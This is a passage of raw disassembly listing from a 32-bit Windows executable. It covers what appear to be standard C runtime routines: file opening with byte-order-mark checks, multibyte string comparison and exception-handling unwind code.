; sub_40E072+165�j ...
mov ecx, [ebp+arg_8]
mov eax, 100h
test ecx, eax
mov edi, 80h
jz short loc_40E222
mov edx, ds:dword_425F74
not edx
and edx, [ebp+arg_10]
test dl, dl
js short loc_40E222
xor edi, edi
inc edi
loc_40E222: ; CODE XREF: sub_40E072+19C�j
; sub_40E072+1AB�j
test cl, 40h
jz short loc_40E23E
or [ebp+var_C], 10000h
or edi, 4000000h
cmp [ebp+var_18], 2
jnz short loc_40E23E
or [ebp+var_8], 4
loc_40E23E: ; CODE XREF: sub_40E072+1B3�j
; sub_40E072+1C6�j
test cx, 1000h
jz short loc_40E247
or edi, eax
loc_40E247: ; CODE XREF: sub_40E072+1D1�j
test cl, 20h
jz short loc_40E25D
or edi, 8000000h
jmp short loc_40E268
; ---------------------------------------------------------------------------
loc_40E254: ; CODE XREF: sub_40E072+144�j
; sub_40E072+17C�j
mov [ebp+var_10], 5
jmp short loc_40E1FF
; ---------------------------------------------------------------------------
loc_40E25D: ; CODE XREF: sub_40E072+1D8�j
test cl, 10h
jz short loc_40E268
or edi, 10000000h
loc_40E268: ; CODE XREF: sub_40E072+1E0�j
; sub_40E072+1EE�j
call sub_40EEB0
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_40E28B
call sub_4057E6
mov [eax], ebx
or dword ptr [esi], 0FFFFFFFFh
call sub_4057D3
mov dword ptr [eax], 18h
jmp short loc_40E2DB
; ---------------------------------------------------------------------------
loc_40E28B: ; CODE XREF: sub_40E072+200�j
mov eax, [ebp+arg_0]
push ebx
push edi
push [ebp+var_10]
mov dword ptr [eax], 1
lea eax, [ebp+var_28]
push eax
push [ebp+var_8]
push [ebp+var_C]
push [ebp+arg_4]
call ds:dword_41D06C
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_40E2E7
mov esi, [esi]
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FEh
loc_40E2CE: ; CODE XREF: sub_40E072+2A2�j
call ds:dword_41D0F0
push eax
call sub_4057F9
loc_40E2DA: ; CODE XREF: sub_40E072+345�j
pop ecx
loc_40E2DB: ; CODE XREF: sub_40E072+217�j
call sub_4057D3
mov eax, [eax]
jmp loc_40E6AB
; ---------------------------------------------------------------------------
loc_40E2E7: ; CODE XREF: sub_40E072+23F�j
push edi
call ds:dword_41D148
cmp eax, ebx
jnz short loc_40E316
mov esi, [esi]
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FEh
push edi
call ds:dword_41D0DC
jmp short loc_40E2CE
; ---------------------------------------------------------------------------
loc_40E316: ; CODE XREF: sub_40E072+27E�j
cmp eax, 2
jnz short loc_40E321
or [ebp+var_1], 40h
jmp short loc_40E32A
; ---------------------------------------------------------------------------
loc_40E321: ; CODE XREF: sub_40E072+2A7�j
cmp eax, 3
jnz short loc_40E32A
or [ebp+var_1], 8
loc_40E32A: ; CODE XREF: sub_40E072+2AD�j
; sub_40E072+2B2�j
push edi
push dword ptr [esi]
call sub_40EC7F
mov eax, [esi]
mov edx, eax
and eax, 1Fh
imul eax, 28h
sar edx, 5
mov edx, ds:dword_433CA0[edx*4]
pop ecx
pop ecx
mov cl, [ebp+var_1]
or cl, 1
mov [edx+eax+4], cl
mov eax, [esi]
mov edx, eax
and eax, 1Fh
imul eax, 28h
sar edx, 5
mov edx, ds:dword_433CA0[edx*4]
lea eax, [edx+eax+24h]
and byte ptr [eax], 80h
mov [ebp+var_3], cl
and [ebp+var_3], 48h
mov [ebp+var_1], cl
jnz loc_40E3FD
test cl, 80h
jz loc_40E637
test byte ptr [ebp+arg_8], 2
jz short loc_40E3FD
push 2
or edi, 0FFFFFFFFh
push edi
push dword ptr [esi]
call sub_41075B
add esp, 0Ch
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_40E3BC
call sub_4057E6
cmp dword ptr [eax], 83h
jz short loc_40E3FD
loc_40E3B0: ; CODE XREF: sub_40E072+379�j
; sub_40E072+389�j ...
push dword ptr [esi]
call sub_408A4D
jmp loc_40E2DA
; ---------------------------------------------------------------------------
loc_40E3BC: ; CODE XREF: sub_40E072+32F�j
push 1
lea eax, [ebp+var_4]
push eax
push dword ptr [esi]
mov [ebp+var_4], bl
call sub_409DAD
add esp, 0Ch
test eax, eax
jnz short loc_40E3ED
cmp [ebp+var_4], 1Ah
jnz short loc_40E3ED
mov eax, [ebp+var_8]
cdq
push edx
push eax
push dword ptr [esi]
call sub_4105A7
add esp, 0Ch
cmp eax, edi
jz short loc_40E3B0
loc_40E3ED: ; CODE XREF: sub_40E072+35F�j
; sub_40E072+365�j
push ebx
push ebx
push dword ptr [esi]
call sub_41075B
add esp, 0Ch
cmp eax, edi
jz short loc_40E3B0
loc_40E3FD: ; CODE XREF: sub_40E072+305�j
; sub_40E072+318�j ...
test [ebp+var_1], 80h
jz loc_40E637
mov ecx, 74000h
test [ebp+arg_8], ecx
mov edi, 4000h
jnz short loc_40E425
mov eax, [ebp+var_14]
and eax, ecx
jnz short loc_40E422
or [ebp+arg_8], edi
jmp short loc_40E425
; ---------------------------------------------------------------------------
loc_40E422: ; CODE XREF: sub_40E072+3A9�j
or [ebp+arg_8], eax
loc_40E425: ; CODE XREF: sub_40E072+3A2�j
; sub_40E072+3AE�j
mov eax, [ebp+arg_8]
and eax, ecx
cmp eax, edi
jz short loc_40E472
cmp eax, 10000h
jz short loc_40E45E
cmp eax, 14000h
jz short loc_40E45E
cmp eax, 20000h
jz short loc_40E46C
cmp eax, 24000h
jz short loc_40E46C
cmp eax, 40000h
jz short loc_40E458
cmp eax, 44000h
jnz short loc_40E475
loc_40E458: ; CODE XREF: sub_40E072+3DD�j
mov [ebp+var_2], 1
jmp short loc_40E475
; ---------------------------------------------------------------------------
loc_40E45E: ; CODE XREF: sub_40E072+3C1�j
; sub_40E072+3C8�j
mov ecx, [ebp+arg_8]
mov eax, 301h
and ecx, eax
cmp ecx, eax
jnz short loc_40E475
loc_40E46C: ; CODE XREF: sub_40E072+3CF�j
; sub_40E072+3D6�j
mov [ebp+var_2], 2
jmp short loc_40E475
; ---------------------------------------------------------------------------
loc_40E472: ; CODE XREF: sub_40E072+3BA�j
mov [ebp+var_2], bl
loc_40E475: ; CODE XREF: sub_40E072+3E4�j
; sub_40E072+3EA�j ...
test [ebp+arg_8], 70000h
jz loc_40E637
test [ebp+var_1], 40h
mov [ebp+var_8], ebx
jnz loc_40E637
mov eax, [ebp+var_C]
mov ecx, 0C0000000h
and eax, ecx
cmp eax, 40000000h
jz loc_40E55B
cmp eax, 80000000h
jz short loc_40E522
cmp eax, ecx
jnz loc_40E637
mov eax, [ebp+var_10]
cmp eax, ebx
jbe loc_40E637
cmp eax, 2
jbe short loc_40E4D1
cmp eax, 4
jbe short loc_40E4F8
loc_40E4C8: ; CODE XREF: sub_40E072+500�j
cmp eax, 5
jnz loc_40E637
loc_40E4D1: ; CODE XREF: sub_40E072+44F�j
; sub_40E072+496�j ...
movsx eax, [ebp+var_2]
xor edi, edi
dec eax
jz loc_40E604
dec eax
jnz loc_40E637
mov [ebp+var_8], 0FEFFh
mov [ebp+var_10], 2
jmp loc_40E612
; ---------------------------------------------------------------------------
loc_40E4F8: ; CODE XREF: sub_40E072+454�j
push 2
push ebx
push ebx
push dword ptr [esi]
call sub_40CCBE
add esp, 10h
or eax, edx
jz short loc_40E4D1
push ebx
push ebx
push ebx
push dword ptr [esi]
call sub_40CCBE
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_40E3B0
loc_40E522: ; CODE XREF: sub_40E072+437�j
push 3
lea eax, [ebp+var_8]
push eax
push dword ptr [esi]
call sub_409DAD
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40E3B0
cmp eax, 2
jz short loc_40E5AB
cmp eax, 3
jnz loc_40E5F6
cmp [ebp+var_8], 0BFBBEFh
jnz short loc_40E5AB
mov [ebp+var_2], 1
jmp loc_40E637
; ---------------------------------------------------------------------------
loc_40E55B: ; CODE XREF: sub_40E072+42C�j
mov eax, [ebp+var_10]
cmp eax, ebx
jbe loc_40E637
cmp eax, 2
jbe loc_40E4D1
cmp eax, 4
ja loc_40E4C8
push 2
push ebx
push ebx
push dword ptr [esi]
call sub_40CCBE
add esp, 10h
or eax, edx
jz loc_40E4D1
push ebx
push ebx
push ebx
push dword ptr [esi]
call sub_40CCBE
add esp, 10h
and eax, edx
loc_40E59D: ; CODE XREF: sub_40E072+590�j
cmp eax, 0FFFFFFFFh
jnz loc_40E637
jmp loc_40E3B0
; ---------------------------------------------------------------------------
loc_40E5AB: ; CODE XREF: sub_40E072+4CC�j
; sub_40E072+4DE�j
mov eax, [ebp+var_8]
and eax, 0FFFFh
cmp eax, 0FFFEh
jnz short loc_40E5D3
push dword ptr [esi]
call sub_408A4D
pop ecx
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_40E5CC: ; CODE XREF: sub_40E072+C6�j
mov eax, esi
jmp loc_40E6AB
; ---------------------------------------------------------------------------
loc_40E5D3: ; CODE XREF: sub_40E072+546�j
cmp eax, 0FEFFh
jnz short loc_40E5F6
push ebx
push 2
push dword ptr [esi]
call sub_41075B
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40E3B0
mov [ebp+var_2], 2
jmp short loc_40E637
; ---------------------------------------------------------------------------
loc_40E5F6: ; CODE XREF: sub_40E072+4D1�j
; sub_40E072+566�j
push ebx
push ebx
push dword ptr [esi]
call sub_41075B
add esp, 0Ch
jmp short loc_40E59D
; ---------------------------------------------------------------------------
loc_40E604: ; CODE XREF: sub_40E072+466�j
mov [ebp+var_8], 0BFBBEFh
mov [ebp+var_10], 3
loc_40E612: ; CODE XREF: sub_40E072+481�j
; sub_40E072+5C3�j
mov eax, [ebp+var_10]
sub eax, edi
push eax
lea eax, [ebp+edi+var_8]
push eax
push dword ptr [esi]
call sub_40D420
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40E3B0
add edi, eax
cmp [ebp+var_10], edi
jg short loc_40E612
loc_40E637: ; CODE XREF: sub_40E072+30E�j
; sub_40E072+38F�j ...
mov eax, [esi]
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, ds:dword_433CA0[ecx*4]
lea eax, [ecx+eax+24h]
mov cl, [eax]
xor cl, [ebp+var_2]
and cl, 7Fh
xor [eax], cl
mov eax, [esi]
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, ds:dword_433CA0[ecx*4]
lea eax, [ecx+eax+24h]
mov ecx, [ebp+arg_8]
mov dl, [eax]
shr ecx, 10h
shl cl, 7
and dl, 7Fh
or cl, dl
cmp [ebp+var_3], bl
mov [eax], cl
jnz short loc_40E6A9
test byte ptr [ebp+arg_8], 8
jz short loc_40E6A9
mov esi, [esi]
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+esi+4]
or byte ptr [eax], 20h
loc_40E6A9: ; CODE XREF: sub_40E072+614�j
; sub_40E072+61A�j
mov eax, ebx
loc_40E6AB: ; CODE XREF: sub_40E072+270�j
; sub_40E072+55C�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E072 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E6B0 proc near ; CODE XREF: sub_40E77C+14�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 14h
push offset dword_421860
call __SEH_prolog4
xor esi, esi
mov [ebp+var_1C], esi
xor eax, eax
mov edi, [ebp+arg_10]
cmp edi, esi
setnz al
cmp eax, esi
jnz short loc_40E6EA
loc_40E6CF: ; CODE XREF: sub_40E6B0+47�j
; sub_40E6B0+5B�j
call sub_4057D3
push 16h
pop edi
mov [eax], edi
push esi
push esi
push esi
push esi
push esi
call sub_402F39
add esp, 14h
mov eax, edi
jmp short loc_40E743
; ---------------------------------------------------------------------------
loc_40E6EA: ; CODE XREF: sub_40E6B0+1D�j
or dword ptr [edi], 0FFFFFFFFh
xor eax, eax
cmp [ebp+arg_0], esi
setnz al
cmp eax, esi
jz short loc_40E6CF
cmp [ebp+arg_14], esi
jz short loc_40E70D
mov eax, [ebp+arg_C]
and eax, 0FFFFFE7Fh
neg eax
sbb eax, eax
inc eax
jz short loc_40E6CF
loc_40E70D: ; CODE XREF: sub_40E6B0+4C�j
mov [ebp+ms_exc.disabled], esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_1C]
push eax
mov eax, edi
call sub_40E072
add esp, 14h
mov [ebp+var_20], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40E74E
mov eax, [ebp+var_20]
cmp eax, esi
jz short loc_40E743
or dword ptr [edi], 0FFFFFFFFh
loc_40E743: ; CODE XREF: sub_40E6B0+38�j
; sub_40E6B0+8E�j
call __SEH_epilog4
retn
sub_40E6B0 endp
; =============== S U B R O U T I N E =======================================
sub_40E749 proc near ; DATA XREF: .kSjx934:00421878�o
xor esi, esi
mov edi, [ebp+18h]
sub_40E749 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40E74E proc near ; CODE XREF: sub_40E6B0+84�p
cmp [ebp-1Ch], esi
jz short locret_40E77B
cmp [ebp-20h], esi
jz short loc_40E773
mov eax, [edi]
mov ecx, eax
sar ecx, 5
and eax, 1Fh
imul eax, 28h
mov ecx, ds:dword_433CA0[ecx*4]
lea eax, [ecx+eax+4]
and byte ptr [eax], 0FEh
loc_40E773: ; CODE XREF: sub_40E74E+8�j
push dword ptr [edi]
call sub_40EE8E
pop ecx
locret_40E77B: ; CODE XREF: sub_40E74E+3�j
retn
sub_40E74E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E77C proc near ; CODE XREF: sub_4081FF+26D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 1
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40E6B0
add esp, 18h
pop ebp
retn
sub_40E77C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E79A proc near ; CODE XREF: sub_40E9B4+A�p
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push [ebp+arg_8]
lea ecx, [ebp+var_14]
call sub_40271F
mov edx, [ebp+arg_0]
xor esi, esi
cmp edx, esi
jnz short loc_40E7E4
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_8], 0
jz short loc_40E7DA
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40E7DA: ; CODE XREF: sub_40E79A+37�j
mov eax, 7FFFFFFFh
jmp loc_40E9B1
; ---------------------------------------------------------------------------
loc_40E7E4: ; CODE XREF: sub_40E79A+19�j
push ebx
mov ebx, [ebp+arg_4]
cmp ebx, esi
jnz short loc_40E81B
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_8], 0
jz short loc_40E811
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40E811: ; CODE XREF: sub_40E79A+6E�j
mov eax, 7FFFFFFFh
jmp loc_40E9B0
; ---------------------------------------------------------------------------
loc_40E81B: ; CODE XREF: sub_40E79A+50�j
mov eax, [ebp+var_10]
cmp [eax+8], esi
jnz short loc_40E847
lea eax, [ebp+var_14]
push eax
push ebx
push edx
call sub_4027D6
add esp, 0Ch
cmp [ebp+var_8], 0
jz loc_40E9B0
mov ecx, [ebp+var_C]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_40E9B0
; ---------------------------------------------------------------------------
loc_40E847: ; CODE XREF: sub_40E79A+87�j
push edi
mov edi, 200h
loc_40E84D: ; CODE XREF: sub_40E79A+1CD�j
movzx cx, byte ptr [edx]
movzx ecx, cx
movzx esi, cl
inc edx
test byte ptr [esi+eax+1Dh], 4
mov [ebp+arg_0], edx
jz short loc_40E8BB
cmp byte ptr [edx], 0
jnz short loc_40E86B
xor esi, esi
jmp short loc_40E8D7
; ---------------------------------------------------------------------------
loc_40E86B: ; CODE XREF: sub_40E79A+CB�j
push 1
push dword ptr [eax+4]
lea ecx, [ebp+var_4]
push 2
push ecx
push 2
dec edx
push edx
push edi
push dword ptr [eax+0Ch]
lea eax, [ebp+var_14]
push eax
call sub_40C2F9
add esp, 24h
cmp eax, 1
jnz short loc_40E896
movzx ax, [ebp+var_4]
jmp short loc_40E8B0
; ---------------------------------------------------------------------------
loc_40E896: ; CODE XREF: sub_40E79A+F3�j
cmp eax, 2
jnz loc_40E96C
movzx ax, [ebp+var_4]
movzx cx, [ebp+var_3]
shl ax, 8
add ax, cx
loc_40E8B0: ; CODE XREF: sub_40E79A+FA�j
inc [ebp+arg_0]
movzx esi, ax
mov eax, [ebp+var_10]
jmp short loc_40E8D7
; ---------------------------------------------------------------------------
loc_40E8BB: ; CODE XREF: sub_40E79A+C6�j
movzx edx, cx
lea ecx, [edx+eax]
test byte ptr [ecx+1Dh], 10h
jz short loc_40E8D4
movzx cx, byte ptr [ecx+11Dh]
movzx esi, cx
jmp short loc_40E8D7
; ---------------------------------------------------------------------------
loc_40E8D4: ; CODE XREF: sub_40E79A+12B�j
movzx esi, dx
loc_40E8D7: ; CODE XREF: sub_40E79A+CF�j
; sub_40E79A+11F�j ...
movzx cx, byte ptr [ebx]
movzx ecx, cx
movzx edx, cl
inc ebx
test byte ptr [edx+eax+1Dh], 4
jz short loc_40E93E
cmp byte ptr [ebx], 0
jnz short loc_40E8F2
xor ecx, ecx
jmp short loc_40E95A
; ---------------------------------------------------------------------------
loc_40E8F2: ; CODE XREF: sub_40E79A+152�j
push 1
push dword ptr [eax+4]
lea ecx, [ebp+var_4]
push 2
push ecx
push 2
lea ecx, [ebx-1]
push ecx
push edi
push dword ptr [eax+0Ch]
lea eax, [ebp+var_14]
push eax
call sub_40C2F9
add esp, 24h
cmp eax, 1
jnz short loc_40E91F
movzx ax, [ebp+var_4]
jmp short loc_40E935
; ---------------------------------------------------------------------------
loc_40E91F: ; CODE XREF: sub_40E79A+17C�j
cmp eax, 2
jnz short loc_40E96C
movzx ax, [ebp+var_4]
movzx cx, [ebp+var_3]
shl ax, 8
add ax, cx
loc_40E935: ; CODE XREF: sub_40E79A+183�j
movzx ecx, ax
mov eax, [ebp+var_10]
inc ebx
jmp short loc_40E95A
; ---------------------------------------------------------------------------
loc_40E93E: ; CODE XREF: sub_40E79A+14D�j
movzx edx, cx
lea ecx, [edx+eax]
test byte ptr [ecx+1Dh], 10h
jz short loc_40E957
movzx cx, byte ptr [ecx+11Dh]
movzx ecx, cx
jmp short loc_40E95A
; ---------------------------------------------------------------------------
loc_40E957: ; CODE XREF: sub_40E79A+1AE�j
movzx ecx, dx
loc_40E95A: ; CODE XREF: sub_40E79A+156�j
; sub_40E79A+1A2�j ...
cmp cx, si
jnz short loc_40E98B
test si, si
jz short loc_40E9A0
mov edx, [ebp+arg_0]
jmp loc_40E84D
; ---------------------------------------------------------------------------
loc_40E96C: ; CODE XREF: sub_40E79A+FF�j
; sub_40E79A+188�j
call sub_4057D3
mov dword ptr [eax], 16h
cmp [ebp+var_8], 0
jz short loc_40E984
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40E984: ; CODE XREF: sub_40E79A+1E1�j
mov eax, 7FFFFFFFh
jmp short loc_40E9AF
; ---------------------------------------------------------------------------
loc_40E98B: ; CODE XREF: sub_40E79A+1C3�j
sbb eax, eax
and eax, 2
dec eax
cmp [ebp+var_8], 0
jz short loc_40E9AF
mov ecx, [ebp+var_C]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_40E9AF
; ---------------------------------------------------------------------------
loc_40E9A0: ; CODE XREF: sub_40E79A+1C8�j
cmp [ebp+var_8], 0
jz short loc_40E9AD
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40E9AD: ; CODE XREF: sub_40E79A+20A�j
xor eax, eax
loc_40E9AF: ; CODE XREF: sub_40E79A+1EF�j
; sub_40E79A+1FB�j ...
pop edi
loc_40E9B0: ; CODE XREF: sub_40E79A+7C�j
; sub_40E79A+9B�j ...
pop ebx
loc_40E9B1: ; CODE XREF: sub_40E79A+45�j
pop esi
leave
retn
sub_40E79A endp
; =============== S U B R O U T I N E =======================================
sub_40E9B4 proc near ; CODE XREF: sub_4081FF+1E6�p
; sub_4081FF+203�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 0
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_40E79A
add esp, 0Ch
retn
sub_40E9B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9C7 proc near ; CODE XREF: sub_40EB30+E�p
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_40E9DC
xor eax, eax
jmp loc_40EB19
; ---------------------------------------------------------------------------
loc_40E9DC: ; CODE XREF: sub_40E9C7+C�j
push edi
push [ebp+arg_C]
lea ecx, [ebp+var_10]
call sub_40271F
mov edi, [ebp+var_C]
cmp [edi+8], ebx
jnz short loc_40EA16
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C8F9
add esp, 0Ch
cmp [ebp+var_4], bl
jz loc_40EB18
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_40EB18
; ---------------------------------------------------------------------------
loc_40EA16: ; CODE XREF: sub_40E9C7+27�j
cmp [ebp+arg_0], ebx
jnz short loc_40EA49
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_40EA3F
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40EA3F: ; CODE XREF: sub_40E9C7+6F�j
mov eax, 7FFFFFFFh
jmp loc_40EB18
; ---------------------------------------------------------------------------
loc_40EA49: ; CODE XREF: sub_40E9C7+52�j
push esi
mov esi, [ebp+arg_4]
cmp esi, ebx
jnz short loc_40EA7F
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_40EA75
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40EA75: ; CODE XREF: sub_40E9C7+A5�j
mov eax, 7FFFFFFFh
jmp loc_40EB17
; ---------------------------------------------------------------------------
loc_40EA7F: ; CODE XREF: sub_40E9C7+88�j
; sub_40E9C7+13C�j
mov eax, [ebp+arg_0]
movzx cx, byte ptr [eax]
dec [ebp+arg_8]
movzx ecx, cx
movzx edx, cl
inc eax
test byte ptr [edx+edi+1Dh], 4
mov [ebp+arg_0], eax
jz short loc_40EAC6
cmp [ebp+arg_8], ebx
jnz short loc_40EAB0
movzx eax, byte ptr [esi]
xor ecx, ecx
test byte ptr [eax+edi+1Dh], 4
jnz short loc_40EB09
movzx eax, ax
jmp short loc_40EAF6
; ---------------------------------------------------------------------------
loc_40EAB0: ; CODE XREF: sub_40E9C7+D6�j
mov al, [eax]
cmp al, bl
jnz short loc_40EABA
xor ecx, ecx
jmp short loc_40EAC6
; ---------------------------------------------------------------------------
loc_40EABA: ; CODE XREF: sub_40E9C7+ED�j
xor edx, edx
inc [ebp+arg_0]
mov dh, cl
mov dl, al
movzx ecx, dx
loc_40EAC6: ; CODE XREF: sub_40E9C7+D1�j
; sub_40E9C7+F1�j
movzx ax, byte ptr [esi]
movzx eax, ax
movzx edx, al
inc esi
test byte ptr [edx+edi+1Dh], 4
jz short loc_40EAF6
cmp [ebp+arg_8], ebx
jnz short loc_40EAE1
loc_40EADD: ; CODE XREF: sub_40E9C7+121�j
xor eax, eax
jmp short loc_40EAF6
; ---------------------------------------------------------------------------
loc_40EAE1: ; CODE XREF: sub_40E9C7+114�j
mov dl, [esi]
dec [ebp+arg_8]
cmp dl, bl
jz short loc_40EADD
xor ebx, ebx
mov bh, al
inc esi
mov bl, dl
movzx eax, bx
xor ebx, ebx
loc_40EAF6: ; CODE XREF: sub_40E9C7+E7�j
; sub_40E9C7+10F�j ...
cmp ax, cx
jnz short loc_40EB1C
cmp cx, bx
jz short loc_40EB09
cmp [ebp+arg_8], ebx
jnz loc_40EA7F
loc_40EB09: ; CODE XREF: sub_40E9C7+E2�j
; sub_40E9C7+137�j
cmp [ebp+var_4], bl
jz short loc_40EB15
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40EB15: ; CODE XREF: sub_40E9C7+145�j
xor eax, eax
loc_40EB17: ; CODE XREF: sub_40E9C7+B3�j
; sub_40E9C7+15E�j ...
pop esi
loc_40EB18: ; CODE XREF: sub_40E9C7+3D�j
; sub_40E9C7+4A�j ...
pop edi
loc_40EB19: ; CODE XREF: sub_40E9C7+10�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40EB1C: ; CODE XREF: sub_40E9C7+132�j
sbb eax, eax
and eax, 2
dec eax
cmp [ebp+var_4], bl
jz short loc_40EB17
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_40EB17
sub_40E9C7 endp
; =============== S U B R O U T I N E =======================================
sub_40EB30 proc near ; CODE XREF: sub_4081FF+1D1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40E9C7
add esp, 10h
retn
sub_40EB30 endp
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_40EB60
push dword ptr [ebp+8]
call sub_413976
loc_40EB60: ; DATA XREF: .kSjx934:0040EB53�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40EB68: ; DATA XREF: sub_40EBAD+B�o
; .kSjx934:0040EC3A�o
mov ecx, [esp+4]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_40EBAC
mov eax, [esp+14h]
mov ecx, [eax-4]
xor ecx, eax
call sub_402710
push ebp
mov ebp, [eax+10h]
mov edx, [eax+28h]
push edx
mov edx, [eax+24h]
push edx
call sub_40EBAD
add esp, 8
pop ebp
mov eax, [esp+8]
mov edx, [esp+10h]
mov [edx], eax
mov eax, 3
locret_40EBAC: ; CODE XREF: .kSjx934:0040EB78�j
retn
; =============== S U B R O U T I N E =======================================
sub_40EBAD proc near ; CODE XREF: .kSjx934:0040EB94�p
var_20 = dword ptr -20h
var_18 = dword ptr -18h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push ebp
push eax
push 0FFFFFFFEh
push offset loc_40EB68
push large dword ptr fs:0
mov eax, ds:dword_423064
xor eax, esp
push eax
lea eax, [esp+24h+var_20]
mov large fs:0, eax
loc_40EBD6: ; CODE XREF: sub_40EBAD:loc_40EC1D�j
mov eax, [esp+24h+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40EC1F
cmp [esp+24h+arg_4], 0FFFFFFFFh
jz short loc_40EBF2
cmp esi, [esp+24h+arg_4]
jbe short loc_40EC1F
loc_40EBF2: ; CODE XREF: sub_40EBAD+3D�j
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+24h+var_18], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40EC1D
push 101h
mov eax, [ebx+esi*4+8]
call sub_40EC5D
mov eax, [ebx+esi*4+8]
call sub_40EC7C
loc_40EC1D: ; CODE XREF: sub_40EBAD+57�j
jmp short loc_40EBD6
; ---------------------------------------------------------------------------
loc_40EC1F: ; CODE XREF: sub_40EBAD+36�j
; sub_40EBAD+43�j
mov ecx, [esp+24h+var_20]
mov large fs:0, ecx
add esp, 18h
pop edi
pop esi
pop ebx
retn
sub_40EBAD endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset loc_40EB68
jnz short locret_40EC53
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40EC53
mov eax, 1
locret_40EC53: ; CODE XREF: .kSjx934:0040EC41�j
; .kSjx934:0040EC4C�j
retn
